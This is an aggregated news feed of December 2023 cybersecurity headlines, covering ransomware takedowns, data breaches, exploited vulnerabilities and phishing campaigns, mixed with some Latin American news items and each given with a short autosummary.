            BMW dealer at risk of takeover by cybercriminals

            ciber
            2023-12-20 https://securityaffairs.com/156182/data-breach/bmw-dealer-at-risk-of-takeover-by-cybercriminals.html
            By neglecting to set a password, a BMW dealer in India has jeopardized the entire network of car dealerships in the country and put its clients at risk. The Cybernews research team has discovered that the Bengaluru branch of BMW Kun Exclusive, a BMW dealership in India, has exposed sensitive data to the public. The […] "

            Autosummary: List of dealerships with leaked credentials: BMW Bird Automotive, BMW EVM Autokraft, BMW Infinity Cars, BMW Krishna Automobiles, BMW Munich Motors, BMW Navnit Motors, BMW Speed Motorwagen, BMW Titanium Autos, BMW Varsha Autohaus, BMW Bavaria Motors, BMW Eminent Cars, BMW Sanghi Classic, BMW OSL Prestige, BMW Gallops Autohaus, BMW Enterprise BMW. Apart from being left accessible to the public, the fact that credentials were saved in plain text already shows weak cybersecurity practices. If you want to learn more about how BMW Kun Exclusive can mitigate the risks take a look at the original post at: https://cybernews.com/security/bmw-india-data-leak/ About the author: Paulina Okunytė, Journalist at Cybernews. Pierluigi Paganini (SecurityAffairs – hacking, BMW dealer) "


            Thousands of turtles in Peru saved from trafficking

            latam
            2023-12-20 https://www.bbc.co.uk/news/world-latin-america-67771166?at_medium=RSS&at_campaign=KARANGA
            Customs officials in Peru seized the turtles, which were bound for Indonesia, at Lima airport. "

            Autosummary: "


            Healthcare software provider data breach impacts 2.7 million

            financial
            2023-12-20 https://www.bleepingcomputer.com/news/security/healthcare-software-provider-data-breach-impacts-27-million/
            ESO Solutions, a provider of software products for healthcare organizations and fire departments, disclosed that data belonging to 2.7 million patients has been compromised as a result of a ransomware attack. [...] "

            Autosummary: "


            Stellar Cyber integrates with SentinelOne for enhanced cybersecurity across environments

            ciber
            2023-12-20 https://www.helpnetsecurity.com/2023/12/20/stellar-cyber-sentinelone-integration/

            Stellar Cyber unveiled its integration with SentinelOne to help organizations protect their on-premises, cloud, hybrid, and IT/OT environments by making use of the latest advancements in cybersecurity technologies. Together, Stellar Cyber and SentinelOne deliver a security operations solution that automates the identification of advanced threats by correlating threat signals from various data sources, providing security analysts with the contextualized threat information they need to mitigate threats. By combining SentinelOne and Stellar Cyber, customers can be … More

            "

            Autosummary: "


            ConnectSecure announces improved cybersecurity scanning platform for MSPs

            ciber
            2023-12-20 https://www.helpnetsecurity.com/2023/12/20/connectsecure-cybersecurity-scanning-platform/

            ConnectSecure announced it will launch the much-anticipated Version 4.0 of its flagship cybersecurity scanning platform by the end of the year. This release marks a significant leap in the technology, offering efficiency and security management for MSPs globally. Revolutionizing cybersecurity with global GRC view: The cornerstone of Version 4.0 is its innovative shift to a global Governance-Risk-and-Compliance (GRC)-centric view. This groundbreaking feature provides MSPs with a comprehensive, real-time overview of all client assets, both networked … More

            "

            Autosummary: Version 4.0: Packed with new features. ConnectSecure’s latest version includes an array of new functionalities designed to streamline MSP operations, such as: multi-perspective views including global, company, and asset-category; enhanced problem and solution views for driving operational efficiencies; timeline views for detailed asset history, crucial for compliance and audits; fully customizable reports with versatile data export options; a robust new Dashboard Engine; significantly improved scalability; advanced bandwidth optimization through smart compression and incremental sync; exclusive, top-tier support entirely based in the US from the Tampa headquarters. Strategic pricing for future-ready cybersecurity: With the significant new platform functionality, ConnectSecure is revising its pricing tiers for 2024. "


            8220 gang exploits old Oracle WebLogic vulnerability to deliver infostealers, cryptominers

            exploits
            2023-12-20 https://www.helpnetsecurity.com/2023/12/20/8220-oracle-weblogic-vulnerability/

            The 8220 gang has been leveraging an old Oracle WebLogic Server vulnerability (CVE-2020-14883) to distribute malware, the Imperva Threat Research team has found. About 8220: Active since 2017, the 8220 gang has been known for deploying cryptocurrency miners on Linux and Windows hosts by exploiting known vulnerabilities. “The group relies on simple, publicly available exploits to target well-known vulnerabilities and exploit easy targets to achieve their objectives. While considered unsophisticated, they are constantly evolving their … More

            "

            Autosummary: "


            Crypto scammers abuse X "feature" to impersonate high-profile accounts

            financial
            2023-12-20 https://www.bleepingcomputer.com/news/security/crypto-scammers-abuse-x-feature-to-impersonate-high-profile-accounts/
            Cryptocurrency scammers are abusing a legitimate X "feature" to promote scams, fake giveaways, and fraudulent Telegram channels used to steal your crypto and NFTs. [...] "

            Autosummary: All of the impersonated organizations seen by BleepingComputer are crypto-related accounts, such as Binance (11 million followers), the Ethereum Foundation (3 million), zkSync (1.3 million), and Chainlink (1 million). "


            New phishing attack steals your Instagram backup codes to bypass 2FA

            financial
            2023-12-20 https://www.bleepingcomputer.com/news/security/new-phishing-attack-steals-your-instagram-backup-codes-to-bypass-2fa/
            A new phishing campaign pretending to be a "copyright infringement" email attempts to steal the backup codes of Instagram users, allowing hackers to bypass the two-factor authentication configured on the account. [...] "

            Autosummary: Phishing the account's backup codes (Trustwave) Despite the campaign being characterized by multiple signs of fraud, like the sender's address, the redirection page, and phishing page URLs, the convincing design and sense of urgency could still trick a significant percentage of targets into giving away their account credentials and backup codes. "


            Fake F5 BIG-IP zero-day warning emails push data wipers

            exploits
            2023-12-20 https://www.bleepingcomputer.com/news/security/fake-f5-big-ip-zero-day-warning-emails-push-data-wipers/
            The Israel National Cyber Directorate warns of phishing emails pretending to be F5 BIG-IP zero-day security updates that deploy Windows and Linux data wipers. [...] "

            Autosummary: Phishing email pushing fake F5 BIG-IP update Source: INCD For Windows users, the email pushes an executable named F5UPDATER.exe [VirusTotal], and for Linux, the file is a shell script named update.sh [VirusTotal]. "


            Google fixes 8th Chrome zero-day exploited in attacks this year

            exploits
            2023-12-20 https://www.bleepingcomputer.com/news/security/google-fixes-8th-chrome-zero-day-exploited-in-attacks-this-year/
            Google has released emergency updates to fix another Chrome zero-day vulnerability exploited in the wild, the eighth patched since the start of the year. [...] "

            Autosummary: "


            Crypto scammers abuse Twitter ‘feature’ to impersonate high-profile accounts

            financial
            2023-12-20 https://www.bleepingcomputer.com/news/security/crypto-scammers-abuse-twitter-feature-to-impersonate-high-profile-accounts/
            Cryptocurrency scammers are abusing a legitimate Twitter "feature" to promote scams, fake giveaways, and fraudulent Telegram channels used to steal your crypto and NFTs. [...] "

            Autosummary: All of the impersonated organizations seen by BleepingComputer are crypto-related accounts, such as Binance (11 million followers), the Ethereum Foundation (3 million), zkSync (1.3 million), and Chainlink (1 million). "


            Google addressed a new actively exploited Chrome zero-day

            exploits
            2023-12-20 https://securityaffairs.com/156231/security/google-addressed-a-new-actively-exploited-chrome-zero-day.html
            Google has released emergency updates to address a new actively exploited zero-day vulnerability in the Chrome browser. Google has released emergency updates to address a new zero-day vulnerability, tracked as CVE-2023-7024, in its web browser Chrome. The flaw has been addressed with the release of version 120.0.6099.129 for Mac, Linux and 120.0.6099.129/130 for Windows which will […] "

            Autosummary: Below is the list of actively exploited zero-day vulnerabilities in Chrome addressed by Google this year: CVE-2023-6345 is the sixth actively exploited zero-day vulnerability in Chrome addressed by Google this year, the other ones are: CVE-2023-2033 – Type Confusion in V8; CVE-2023-2136 – Integer overflow in the Skia graphics library; CVE-2023-3079 – Type Confusion in V8; CVE-2023-4863 – Heap buffer overflow in WebP; CVE-2023-5217 – "


            Xfinity discloses data breach after recent Citrix server hack

            financial
            2023-12-19 https://www.bleepingcomputer.com/news/security/xfinity-discloses-data-breach-after-recent-citrix-server-hack/
            Comcast Cable Communications, doing business as Xfinity, disclosed on Monday that attackers who breached one of its Citrix servers in October also stole customer-sensitive information from its systems. [...] "

            Autosummary: "


            The ransomware attack on Westpole is disrupting digital services for Italian public administration

            exploits ransomware
            2023-12-19 https://securityaffairs.com/156090/cyber-crime/westpole-ransomware-attack.html
            An alleged Lockbit 3.0 ransomware attack on the Italian cloud service provider Westpole disrupted multiple services of local and government organizations and municipalities. On December 8, 2023, a cyber attack hit the Italian cloud service provider Westpole, which specializes in digital services for public administration. The incident impacted a Westpole customer company named PA […] "

            Autosummary: Pierluigi Paganini, December 19, 2023. An alleged Lockbit 3.0 ransomware attack on the Italian cloud service provider Westpole disrupted multiple services of local and government organizations and municipalities. "


            Ransomware trends and recovery strategies companies should know

            exploits
            2023-12-19 https://www.helpnetsecurity.com/2023/12/19/ransomware-trends-recovery-statistics/

            Ransomware attacks can have severe consequences, causing financial losses, reputational damage, and operational disruptions. The methods used to deliver ransomware vary, including phishing emails, malicious websites, and exploiting vulnerabilities in software or operating systems. Cybercriminals often target organizations with weak cybersecurity measures, outdated software, or inadequate employee training on recognizing and preventing phishing attacks. In this article, you will find excerpts from ransomware attacks surveys we covered in 2023. Using this data, your security team … More

            "

            Autosummary: Ransomware attacks set to break records in 2023: Ransomware attacks continue at a record-breaking pace, with Q3 2023 global ransomware attack frequency up 11% over Q2 and 95% year-over-year (YoY), according to Corvus Insurance. Ransomware groups are shifting their focus away from larger targets: US-based organizations remain a prime target for ransomware operators, with the highest number of ransomware victims in the first half of 2023 (949) – accounting for nearly half of all ransomware attacks. "


            8220 Gang Exploiting Oracle WebLogic Server Vulnerability to Spread Malware

            exploits
            2023-12-19 https://thehackernews.com/2023/12/8220-gang-exploiting-oracle-weblogic.html
            The threat actors associated with the 8220 Gang have been observed exploiting a high-severity flaw in Oracle WebLogic Server to propagate their malware. The security shortcoming is CVE-2020-14883 (CVSS score: 7.2), a remote code execution bug that could be exploited by authenticated attackers to take over susceptible servers. "This vulnerability allows remote authenticated "

            Autosummary: "


            Double-Extortion Play Ransomware Strikes 300 Organizations Worldwide

            exploits ransomware
            2023-12-19 https://thehackernews.com/2023/12/double-extortion-play-ransomware.html
            The threat actors behind the Play ransomware are estimated to have impacted approximately 300 entities as of October 2023, according to a new joint cybersecurity advisory from Australia and the U.S. "Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data and have impacted a wide range of businesses and critical infrastructure organizations in North "

            Autosummary: The threat actors behind the Play ransomware are estimated to have impacted approximately 300 entities as of October 2023, according to a new joint cybersecurity advisory from Australia and the U.S. "Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data and have impacted a wide range of businesses and critical infrastructure organizations in North America, South America, Europe, and Australia," authorities said. "


            Xfinity discloses data breach affecting over 35 million people

            financial
            2023-12-19 https://www.bleepingcomputer.com/news/security/xfinity-discloses-data-breach-affecting-over-35-million-people/
            Comcast Cable Communications, doing business as Xfinity, disclosed on Monday that attackers who breached one of its Citrix servers in October also stole customer-sensitive information from its systems. [...] "

            Autosummary: "[F]or some customers, other information may also have been included, such as names, contact information, last four digits of social security numbers, dates of birth and/or secret questions and answers. "


            Cleafy improves banking security with real-time AI capabilities

            financial
            2023-12-19 https://www.helpnetsecurity.com/2023/12/19/cleafy-platform/

            In the ever-evolving landscape of banking and financial security, new malware variants pose a significant and imminent challenge. Traditionally, both the identification and classification of these threats only occurred post-attack, leaving banks and financial institutions vulnerable to substantial losses and reputational damage. Cleafy has unveiled technology to proactively classify, detect and respond to new malware variants in real-time, providing an innovative solution to an escalating problem. This product update comes as a result of a … More

            "

            Autosummary: The continuous matching capability, a crucial part of this new product release, ensures that all Cleafy customers can detect the new malware variant in real-time, without the need for time-consuming retro-matching activities. "


            SSH vulnerability exploitable in Terrapin attacks (CVE-2023-48795)

            exploits
            2023-12-19 https://www.helpnetsecurity.com/2023/12/19/ssh-vulnerability-cve-2023-48795/

            Security researchers have discovered a vulnerability (CVE-2023-48795) in the SSH cryptographic network protocol that could allow an attacker to downgrade the connection’s security by truncating the extension negotiation message. The Terrapin attack: Terrapin is a prefix truncation attack targeting the SSH protocol. “By carefully adjusting the sequence numbers during the handshake, an attacker can remove an arbitrary amount of messages sent by the client or server at the beginning of the secure channel without the … More

            "

            Autosummary: Vendors/maintainers of affected implementations, applications and Linux distros have been pushing out fixes: AsyncSSH, LibSSH, OpenSSH, PuTTY, Transmit, SUSE, and others. "


            Iranian Hackers Using MuddyC2Go in Telecom Espionage Attacks Across Africa

            Telcos
            2023-12-19 https://thehackernews.com/2023/12/iranian-hackers-using-muddyc2go-in-new.html
            The Iranian nation-state actor known as MuddyWater has leveraged a newly discovered command-and-control (C2) framework called MuddyC2Go in its attacks on the telecommunications sector in Egypt, Sudan, and Tanzania. The Symantec Threat Hunter Team, part of Broadcom, is tracking the activity under the name Seedworm, which is also tracked under the monikers Boggy Serpens, Cobalt "

            Autosummary: The Symantec Threat Hunter Team, part of Broadcom, is tracking the activity under the name Seedworm, which is also tracked under the monikers Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (formerly Mercury), Static Kitten, TEMP.Zagros, and Yellow Nix. "


            Smishing Triad: Cybercriminals Impersonate UAE Federal Authority for Identity and Citizenship on the Peak of Holidays Season

            financial ciber
            2023-12-19 https://securityaffairs.com/156119/cyber-crime/smishing-uae-federal-authority-sms.html
            Smishing Triad: Researchers warn crooks are impersonating the UAE Federal Authority for Identity and Citizenship ahead of the Holiday Season. Resecurity, Inc. (USA) has identified a new fraudulent campaign by the Smishing Triad gang in which they are impersonating the United Arab Emirates Federal Authority for Identity and Citizenship. This campaign involves malicious SMS/iMessage texts that pretend […] "

            Autosummary: "


            FBI disrupts Blackcat ransomware operation, creates decryption tool

            exploits ransomware
            2023-12-19 https://www.bleepingcomputer.com/news/security/fbi-disrupts-blackcat-ransomware-operation-creates-decryption-tool/
            The Department of Justice announced today that the FBI successfully breached the ALPHV ransomware operation's servers to monitor their activities and obtain decryption keys. [...] "

            Autosummary: FBI seizure message on ALPHV data leak site Source: BleepingComputer.com The seizure message states the law enforcement operation was conducted by police and investigative agencies from the US, Europol, Denmark, Germany, UK, Netherlands, Germany, Australia, Spain, and Austria. "


            Behind the Scenes of Matveev's Ransomware Empire: Tactics and Team

            exploits ransomware industry
            2023-12-19 https://thehackernews.com/2023/12/behind-scenes-of-matveevs-ransomware.html
            Cybersecurity researchers have shed light on the inner workings of the ransomware operation led by Mikhail Pavlovich Matveev, a Russian national who was indicted by the U.S. government earlier this year for his alleged role in launching thousands of attacks across the world. Matveev, who resides in Saint Petersburg and is known by the aliases Wazawaka, m1x, Boriselcin, Uhodiransomwar, "

            Autosummary: Matveev, besides working as an affiliate for Conti, LockBit, Hive, Monti, Trigona, and NoEscape, also had a management-level role with the Babuk ransomware group up until early 2022, while sharing what's being described as a "complex relationship" with another actor named Dudka, who is likely the developer behind Babuk and Monti. "


            FBI: ALPHV ransomware raked in $300 million from over 1,000 victims

            exploits ransomware
            2023-12-19 https://www.bleepingcomputer.com/news/security/fbi-alphv-ransomware-raked-in-300-million-from-over-1-000-victims/
            The ALPHV/BlackCat ransomware gang has made over $300 million in ransom payments from more than 1,000 victims worldwide as of September 2023, according to the Federal Bureau of Investigation (FBI). [...] "

            Autosummary: "According to the FBI, as of September 2023, ALPHV Blackcat affiliates have compromised over 1000 entities—nearly 75 percent of which are in the United States and approximately 250 outside the United States—, demanded over $500 million, and received nearly $300 million in ransom payments. "


            Interpol operation arrests 3,500 cybercriminals, seizes $300 million

            ciber
            2023-12-19 https://www.bleepingcomputer.com/news/security/interpol-operation-arrests-3-500-cybercriminals-seizes-300-million/
            An international law enforcement operation codenamed "Operation HAECHI IV" has led to the arrest of 3,500 suspects of various lower-tier cybercrimes and seized $300 million in illicit proceeds. [...] "

            Autosummary: "


            How the FBI seized BlackCat (ALPHV) ransomware’s servers

            exploits ransomware
            2023-12-19 https://www.bleepingcomputer.com/news/security/how-the-fbi-seized-blackcat-alphv-ransomwares-servers/
            An unsealed FBI search warrant revealed how law enforcement hijacked the ALPHV/BlackCat ransomware operations websites and seized the associated URLs. [...] "

            Autosummary: "From the Campaigns screen, affiliates can see the victim entity, full ransom price demanded, discount ransom price, expiration date, cryptocurrency addresses, cryptocurrency transactions, type of computer system compromised, ransom demand note, chats with the victim, and more. "


            #StopRansomware: ALPHV Blackcat

            exploits ransomware
            2023-12-19 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-353a

            SUMMARY

            Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

            The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known IOCs and TTPs associated with the ALPHV Blackcat ransomware as a service (RaaS) identified through FBI investigations as recently as Dec. 6, 2023.

            This advisory provides updates to the FBI FLASH BlackCat/ALPHV Ransomware Indicators of Compromise released April 19, 2022. Since previous reporting, ALPHV Blackcat actors released a new version of the malware, and the FBI identified over 1000 victims worldwide targeted via ransomware and/or data extortion.

            FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ALPHV Blackcat ransomware and data extortion incidents.

            In February 2023, ALPHV Blackcat administrators announced the ALPHV Blackcat Ransomware 2.0 Sphynx update, which was rewritten to provide additional features to affiliates, such as better defense evasion and additional tooling. This ALPHV Blackcat update has the capability to encrypt both Windows and Linux devices, and VMware instances. ALPHV Blackcat affiliates have extensive networks and experience "

            Autosummary: Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Regularly educate users on identifying suspicious emails and links, not interacting with those suspicious items, and the importance of reporting instances of opening suspicious emails, links, attachments, or other potential lures. ALPHV Blackcat affiliates use the open source adversary-in-the-middle attack [T1557] framework Evilginx2, which allows them to obtain multifactor authentication (MFA) credentials, login credentials, and session cookies. After exfiltrating and/or encrypting data, ALPHV Blackcat affiliates communicate with victims via TOR [S0183], Tox, email, or encrypted applications. According to the FBI, as of September 2023, ALPHV Blackcat affiliates have compromised over 1000 entities—nearly 75 percent of which are in the United States and approximately 250 outside the United States—, demanded over $500 million, and received nearly $300 million in ransom payments. "


            FBI Takes Down BlackCat Ransomware, Releases Free Decryption Tool

            exploits ransomware
            2023-12-19 https://thehackernews.com/2023/12/fbi-takes-down-blackcat-ransomware.html
            The U.S. Justice Department (DoJ) has officially announced the disruption of the BlackCat ransomware operation and released a decryption tool that victims can use to regain access to files locked by the malware. Court documents show that the U.S. Federal Bureau of Investigation (FBI) enlisted the help of a confidential human source (CHS) to act as an affiliate for the BlackCat and gain "

            Autosummary: "


            New Web injections campaign steals banking data from 50,000 people

            financial
            2023-12-19 https://www.bleepingcomputer.com/news/security/new-web-injections-campaign-steals-banking-data-from-50-000-people/
            A new malware campaign that emerged in March 2023 used JavaScript web injections to try to steal the banking data of over 50,000 users of 40 banks in North America, South America, Europe, and Japan. [...] "

            Autosummary: It has multiple operational states determined by a "mlink" flag set by the server, including injecting prompts for phone numbers or OTP tokens, displaying error messages, or simulating page loading, all part of its data-stealing strategy. "


            FBI issues advisory over Play ransomware

            exploits ransomware
            2023-12-19 https://www.malwarebytes.com/blog/news/2023/12/fbi-issues-advisory-over-play-ransomware
            The FBI, CISA, and ACSC have released a joint cybersecurity advisory about the Play ransomware group and their MO. "

            Autosummary: The FBI lets readers know it is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Play ransomware actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Screenshot of the PLAY leak site The joint CSA emphasizes the importance of having an actionable recovery plan, using multi-factor authentication (MFA), and keeping all operating systems, software, and firmware up to date. "


            FBI claims to have dismantled AlphV/Blackcat ransomware operation, but the group denies it

            exploits ransomware
            2023-12-19 https://securityaffairs.com/156124/cyber-crime/alphv-blackcat-ransomware-group-seizure.html
            The Federal Bureau of Investigation (FBI) announced the seizure of the Tor leak site of the AlphV/Blackcat ransomware group. The FBI seized the Tor leak site of the AlphV/Blackcat ransomware group and replaced the home page with the announcement of the seizure. BlackCat/ALPHV ransomware gang has been active since November 2021, the list of its victims is […] "

            Autosummary: The seizure is the result of a joint operation conducted by international law enforcement agencies from the US, Denmark, Germany, UK, Netherlands, Germany, Australia, Spain, Austria and Europol. Because of their actions, we are introducing new rules, or rather, we are removing ALL rules except one, you cannot touch the CIS, you can now block hospitals, nuclear power plants, anything, anywhere. "



            Fourteen killed in Argentina as storm brings 150km/h winds

            latam
            2023-12-18 https://www.bbc.co.uk/news/world-latin-america-67745451?at_medium=RSS&at_campaign=KARANGA
            The storm damaged buildings and caused power cuts across Buenos Aires province over the weekend. "

            Autosummary: "


            Creating a formula for effective vulnerability prioritization

            exploits
            2023-12-18 https://www.helpnetsecurity.com/2023/12/18/michael-gorelik-morphisec-vulnerability-prioritization/

            In this Help Net Security interview, Michael Gorelik, CTO and Head of Malware Research at Morphisec, provides insights into the business impact of vulnerabilities. Gorelik discusses challenges posed by regulatory frameworks, incomplete asset inventories, and manual methods, while also exploring the role of automated systems, the future of vulnerability prioritization in the face of evolving cyber threats, and key factors organizations should consider in building effective remediation strategies. How does understanding the business impact of … More

            The post Creating a formula for effective vulnerability prioritization appeared first on Help Net Security.

            "

            Autosummary: For this, vulnerability management systems should offer multiple options to drive efforts, including the grouping of computing assets by business context, factoring the exposure of entire hosts (computing devices), aggregating vulnerabilities on applications, and presenting exploitability and the potential of exploitability for vulnerabilities. The management of vulnerabilities is a key component in many compliance and regulatory frameworks such as NIST CSF, PCI DSS (Payment Card Industry Data Security Standard), NERC CIP (North American Electric Reliability Corporation Critical Infrastructure Protection), CIS (Center for Internet Security) critical security controls, GDPR (General Data Protection Regulation) and others. Gorelik discusses challenges posed by regulatory frameworks, incomplete asset inventories, and manual methods, while also exploring the role of automated systems, the future of vulnerability prioritization in the face of evolving cyber threats, and key factors organizations should consider in building effective remediation strategies. "


            CISA Urges Manufacturers Eliminate Default Passwords to Thwart Cyber Threats

            industry
            2023-12-18 https://thehackernews.com/2023/12/cisa-urges-manufacturers-eliminate.html
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging manufacturers to get rid of default passwords on internet-exposed systems altogether, citing severe risks that could be exploited by malicious actors to gain initial access to, and move laterally within, organizations. In an alert published last week, the agency called out Iranian threat actors affiliated with "

            Autosummary: The development also follows the release of a new advisory from CISA that outlines security countermeasures for healthcare and critical infrastructure entities to fortify their networks against potential malicious activity and reduce the likelihood of domain compromise:
            - Enforce strong passwords and phishing-resistant MFA
            - Ensure that only ports, protocols, and services with validated business needs are running on each system
            - Configure service accounts with only the permissions necessary for the services they operate
            - Change all default passwords for applications, operating systems, routers, firewalls, wireless access points, and other systems
            - Discontinue reuse or sharing of administrative credentials among user/administrative accounts
            - Mandate consistent patch management
            - Implement network segregation controls
            - Evaluate the use of unsupported hardware and software and discontinue where possible
            - Encrypt personally identifiable information (PII) and other sensitive data
            On a related note, the U.S. National Security Agency (NSA), Office of the Director of National Intelligence (ODNI), and CISA published a list of recommended practices that organizations can adopt in order to harden the software supply chain and improve the safety of their open-source software management processes. "


            Chileans vote not to replace Pinochet-era constitution

            latam
            2023-12-18 https://www.bbc.co.uk/news/world-latin-america-67745456?at_medium=RSS&at_campaign=KARANGA
            The new constitution would have affected areas including abortions, strike action and indigenous rights. "

            Autosummary: "


            QakBot Malware Resurfaces with New Tactics, Targeting the Hospitality Industry

            exploits industry
            2023-12-18 https://thehackernews.com/2023/12/qakbot-malware-resurfaces-with-new.html
            A new wave of phishing messages distributing the QakBot malware has been observed, more than three months after a law enforcement effort saw its infrastructure dismantled by infiltrating its command-and-control (C2) network. Microsoft, which made the discovery, described it as a low-volume campaign that began on December 11, 2023, and targeted the hospitality industry. "Targets "

            Autosummary: "


            Mortgage giant Mr. Cooper data breach affects 14.7 million people

            financial
            2023-12-18 https://www.bleepingcomputer.com/news/security/mortgage-giant-mr-cooper-data-breach-affects-147-million-people/
            Mr. Cooper is sending notices of a data breach to customers who were impacted by a cyberattack the firm suffered in November 2023. [...] "

            Autosummary: "


            MongoDB warns customers about data breach after cyberattack

            financial ciber
            2023-12-18 https://www.malwarebytes.com/blog/news/2023/12/mongodb-warns-customers-about-data-breach-after-cyberattack
            MongoDB has warned customers about a data breach that leaked information about their customers. The incident is under investigation. "

            Autosummary: The targeted system contained customer names, phone numbers, and email addresses among other customer account metadata, including system logs for one customer. "


            Rhadamanthys Malware: Swiss Army Knife of Information Stealers Emerges

            exploits
            2023-12-18 https://thehackernews.com/2023/12/rhadamanthys-malware-swiss-army-knife.html
            The developers of the information stealer malware known as Rhadamanthys are actively iterating on its features, broadening its information-gathering capabilities and also incorporating a plugin system to make it more customizable. This approach not only transforms it into a threat capable of delivering "specific distributor needs," but also makes it more potent, Check Point said "

            Autosummary: "The similarity is apparent at many levels: custom executable formats, the use of similar virtual filesystems, identical paths to some of the components, reused functions, similar use of steganography, use of LUA scripts, and overall analogous design," the researchers said, describing the malware’s development as "fast-paced and ongoing. "


            Four U.S. Nationals Charged in $80 Million Pig Butchering Crypto Scam

            financial
            2023-12-18 https://thehackernews.com/2023/12/four-us-nationals-charged-in-80-million.html
            Four U.S. nationals have been charged for participating in an illicit scheme that earned them more than $80 million via cryptocurrency investment scams. The defendants – Lu Zhang, 36, of Alhambra, California; Justin Walker, 31, of Cypress, California; Joseph Wong, 32, Rosemead, California; and Hailong Zhu, 40, Naperville, Illinois – have been charged with conspiracy to commit money laundering, "

            Autosummary: The defendants – Lu Zhang, 36, of Alhambra, California; Justin Walker, 31, of Cypress, California; Joseph Wong, 32, Rosemead, California; and Hailong Zhu, 40, Naperville, Illinois – have been charged with conspiracy to commit money laundering, concealment money laundering, and international money laundering. "


            Qakbot is back and targets the Hospitality industry

            industry
            2023-12-18 https://securityaffairs.com/156047/cyber-crime/qakbot-targets-hospitality-industry.html
            Experts warn of a new phishing campaign distributing the QakBot malware, months after law enforcement dismantled its infrastructure. In August, the FBI announced that the Qakbot botnet was dismantled as a result of an international law enforcement operation named Operation ‘Duck Hunt.’ Qakbot, also known as QBot, QuackBot and Pinkslipbot, is an info-stealing malware that has been active since 2008. The […] "

            Autosummary: Qakbot is back and targets the Hospitality industry (Pierluigi Paganini, December 18, 2023). Experts warn of a new phishing campaign distributing the QakBot malware, months after law enforcement dismantled its infrastructure. "


            Mexico violence: Gunmen kill 12 people at Christmas celebration

            latam
            2023-12-18 https://www.bbc.co.uk/news/world-latin-america-67748317?at_medium=RSS&at_campaign=KARANGA
            The victims were young people who had gathered at a venue for a religious pre-Christmas event. "

            Autosummary: "


            Vans and North Face owner VF Corp hit by ransomware attack

            exploits ransomware
            2023-12-18 https://www.bleepingcomputer.com/news/security/vans-and-north-face-owner-vf-corp-hit-by-ransomware-attack/
            American global apparel and footwear giant VF Corporation, the owner of brands like Supreme, Vans, Timberland, and The North Face, has disclosed a security incident that caused operational disruptions. [...] "

            Autosummary: Apart from the brands mentioned above, VF Corp. owns Dickies, Eastpak, Kipling, Napapijri, AND1, JanSport, Icebreaker, Altra Running, and SmartWool. "


            FBI: Play ransomware breached 300 victims, including critical orgs

            exploits ransomware
            2023-12-18 https://www.bleepingcomputer.com/news/security/fbi-play-ransomware-breached-300-victims-including-critical-orgs/
            The Federal Bureau of Investigation (FBI) says the Play ransomware gang has breached roughly 300 organizations worldwide between June 2022 and October 2023, some of them critical infrastructure entities. [...] "

            Autosummary: "This includes requiring multifactor authentication, maintaining offline backups of data, implementing a recovery plan, and keeping all operating systems, software, and firmware up to date." "


            Beware: Experts Reveal New Details on Zero-Click Outlook RCE Exploits

            exploits
            2023-12-18 https://thehackernews.com/2023/12/beware-experts-reveal-new-details-on.html
            Technical details have emerged about two now-patched security flaws in Microsoft Windows that could be chained by threat actors to achieve remote code execution on the Outlook email service sans any user interaction. "An attacker on the internet can chain the vulnerabilities together to create a full, zero-click remote code execution (RCE) exploit against Outlook clients," Akamai security "

            Autosummary: The security issues, which were addressed by Microsoft in August and October 2023, respectively, are listed below:
            - CVE-2023-35384 (CVSS score: 5.4) - Windows HTML Platforms Security Feature Bypass Vulnerability
            - CVE-2023-36710 (CVSS score: 7.8) - Windows Media Foundation Core Remote Code Execution Vulnerability
            CVE-2023-35384 has been described by Akamai as a bypass for a critical security flaw that Microsoft patched in March 2023. "


            Texas to arrest illegal migrants in challenge to federal government

            government
            2023-12-18 https://www.bbc.co.uk/news/world-us-canada-67753877?at_medium=RSS&at_campaign=KARANGA
            Police will be able to hold undocumented border crossers - an area until now enforced by federal officials. "

            Autosummary: "


            Chile votes on new conservative draft constitution

            latam
            2023-12-17 https://www.bbc.co.uk/news/world-latin-america-67715543?at_medium=RSS&at_campaign=KARANGA
            The first draft was rejected as too left-wing - now a new, more conservative draft is put to a vote. "

            Autosummary: "


            Week in review: Apache Struts vulnerability exploit attempt, EOL Sophos firewalls get hotfix

            exploits
            2023-12-17 https://www.helpnetsecurity.com/2023/12/17/week-in-review-apache-struts-vulnerability-exploit-attempt-eol-sophos-firewalls-get-hotfix/

            Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: SCS 9001 2.0 reveals enhanced controls for global supply chains In this Help Net Security interview, Mike Regan, VP of Business Performance at TIA, discusses SCS 9001 Release 2.0, a certifiable standard crafted to assist organizations in operationalizing the NIST and other government guidelines and frameworks. Balancing AI advantages and risks in cybersecurity strategies In this Help Net Security interview, … More

            The post Week in review: Apache Struts vulnerability exploit attempt, EOL Sophos firewalls get hotfix appeared first on Help Net Security.

            "

            Autosummary: A closer look at LATMA, the open-source lateral movement detection tool In this Help Net Security video, Gal Sadeh, Head of Data and Security Research at Silverfort, discusses LATMA, a free, open-source tool. Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: SCS 9001 2.0 reveals enhanced controls for global supply chains In this Help Net Security interview, Mike Regan, VP of Business Performance at TIA, discusses SCS 9001 Release 2.0, a certifiable standard crafted to assist organizations in operationalizing the NIST and other government guidelines and frameworks. "


            InfectedSlurs botnet targets QNAP VioStor NVR vulnerability

            exploits
